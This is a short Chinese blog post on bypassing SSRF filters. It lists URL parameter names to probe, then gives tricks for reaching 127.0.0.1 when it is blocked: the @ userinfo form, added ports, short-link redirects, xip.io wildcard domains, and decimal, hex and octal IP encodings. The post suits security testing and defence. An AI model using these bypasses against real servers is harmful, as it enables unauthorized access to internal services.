SSRF中的绕过姿势

从以下URL关键字中寻找SSRF漏洞:

[sourcecode language="plain"] share wap url link src source target u 3g display sourceURl imageURL domain ... [/sourcecode]

http://127.0.0.1/ 被过滤的时候,可以尝试一下几种方式: 1、@

[sourcecode language="plain"]http://abc@127.0.0.1[/sourcecode]

2、添加端口号

[sourcecode language="plain"]http://127.0.0.1:8080[/sourcecode]

3、短地址

[sourcecode language="plain"]http://dwz.cn/11SMa[/sourcecode]

4、可以指向任意ip的域名:xip.io

[sourcecode language="plain"] 10.0.0.1.xip.io 10.0.0.1 www.10.0.0.1.xip.io 10.0.0.1 mysite.10.0.0.1.xip.io 10.0.0.1 foo.bar.10.0.0.1.xip.io 10.0.0.1 [/sourcecode]

5、ip地址转换成进制来访问

[sourcecode language="plain"]115.239.210.26 = 16373751032[/sourcecode]

首先把这四段数字给 转成 16 进制!结果:73 ef d2 1a 然后把 73efd21a 这十六进制一起转换成8进制!访问使用http://00+转换后十六进制

[sourcecode language="plain"]115.239.210.26 = 0x73.0xef.0xd2.0x1a[/sourcecode]

八进制

[sourcecode language="plain"]115.239.210.26 = 0163.0357.0322.0032[/sourcecode]

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏偏前端工程师的驿站

Velocity魔法堂系列二:VTL语法详解

一、前言                               Velocity作为历史悠久的模板引擎不单单可以替代JSP作为Java Web的服务端网页...

2185
来自专栏Java编程技术

并发队列-无界非阻塞队列ConcurrentLinkedQueue原理探究

常用的并发队列有阻塞队列和非阻塞队列,前者使用锁实现,后者则使用CAS非阻塞算法实现,使用非阻塞队列一般性能比较好,下面就看看常用的非阻塞ConcurrentL...

1211
来自专栏IT技术精选文摘

阿里架构师带你深入浅出jvm

2312
来自专栏数据结构与算法

3186 队列练习 2

3186 队列练习 2 时间限制: 1 s 空间限制: 128000 KB 题目等级 : 黄金 Gold 题目描述 Description (此题...

2585
来自专栏云霄雨霁

设计模式----状态模式

1530
来自专栏数据结构与算法

3185 队列练习 1

3185 队列练习 1 时间限制: 1 s 空间限制: 128000 KB 题目等级 : 黄金 Gold 题目描述 Description 给定一...

3026
来自专栏技术小站

编程填空:第i位替换 编程填空:第i位取反 编程填空:左边i位取反

写出函数中缺失的部分,使得函数返回值为一个整数,该整数的第i位和m的第i位相同,其他位和n相同。

2031
来自专栏Java大联盟

Java面试手册:核心基础-3

2.数组有没有length()这个方法? String有没有length()这个方法?

1583
来自专栏移动开发的那些事儿

JVM内存区域与OOM

当虚拟机在执行方法testMethod的时候,这时候就会在Java虚拟机栈上创建一个栈帧,然后入栈,然而在testMethod方法内又不断的递归调用testMe...

1172
来自专栏linux运维学习

linux学习第六十五篇:for循环,while循环, break跳出循环,continue结束本次循环

for循环 语法:for 变量名 in 条件; do …; done for循环会以空格作为分隔符 案例1 #!/bin/bash sum=0 for i ...

28510

扫码关注云+社区

领取腾讯云代金券